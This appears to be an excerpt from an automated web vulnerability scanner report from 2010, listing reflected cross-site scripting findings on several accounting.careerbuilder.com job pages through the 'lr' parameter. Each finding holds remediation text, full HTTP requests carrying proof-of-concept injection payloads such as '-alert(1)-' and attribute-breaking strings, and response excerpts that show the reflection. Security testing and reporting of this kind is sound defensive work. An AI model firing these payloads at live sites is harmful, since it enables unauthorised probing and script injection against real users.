<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f293'-alert(1)-'786db9e58ce was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189895
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL12
Date: Sun, 14 Nov 2010 23:22:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a16"%20a%3db%20a8d8796ad8c was submitted in the lr parameter. This input was echoed as e7a16" a=b a8d8796ad8c in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aae7a16"%20a%3db%20a8d8796ad8c HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189156
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 23:22:27 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54425'-alert(1)-'69e07ba1259 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197774
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:09:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42478"%20a%3db%203a96f68a939 was submitted in the lr parameter. This input was echoed as 42478" a=b 3a96f68a939 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478"%20a%3db%203a96f68a939&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197180
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR15
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d2"%20a%3db%20c76e3eed769 was submitted in the lr parameter. This input was echoed as 7a9d2" a=b c76e3eed769 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2"%20a%3db%20c76e3eed769&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196950
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL20
Date: Sun, 14 Nov 2010 23:22:41 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c60b1'-alert(1)-'078d4fa7612 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197631
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3df9'-alert(1)-'57eee3b2f1c was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197519
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL11
Date: Sun, 14 Nov 2010 23:23:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20e1"%20a%3db%2003b3bbde943 was submitted in the lr parameter. This input was echoed as c20e1" a=b 03b3bbde943 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1"%20a%3db%2003b3bbde943&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196781
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL24
Date: Sun, 14 Nov 2010 23:22:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56b3d'-alert(1)-'9ff60971f08 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190195
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL27
Date: Sun, 14 Nov 2010 23:24:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69413"%20a%3db%20317ba7aab6a was submitted in the lr parameter. This input was echoed as 69413" a=b 317ba7aab6a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa69413"%20a%3db%20317ba7aab6a HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189577
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 23:23:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2848d'-alert(1)-'7bd88549adc was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189967
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 23:24:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a36e"%20a%3db%20771cc9e4121 was submitted in the lr parameter. This input was echoed as 9a36e" a=b 771cc9e4121 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa9a36e"%20a%3db%20771cc9e4121 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189396
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 23:24:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b54"%20a%3db%204c9a7198dfe was submitted in the lr parameter. This input was echoed as c9b54" a=b 4c9a7198dfe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54"%20a%3db%204c9a7198dfe&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196881
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL18
Date: Sun, 14 Nov 2010 23:24:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58e6'-alert(1)-'45be1a04315 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197499
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:25:16 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 351db'-alert(1)-'2f09466539d was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida_Miami_TaxAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5351db'-alert(1)-'2f09466539d&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197530
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_taxaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:27:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
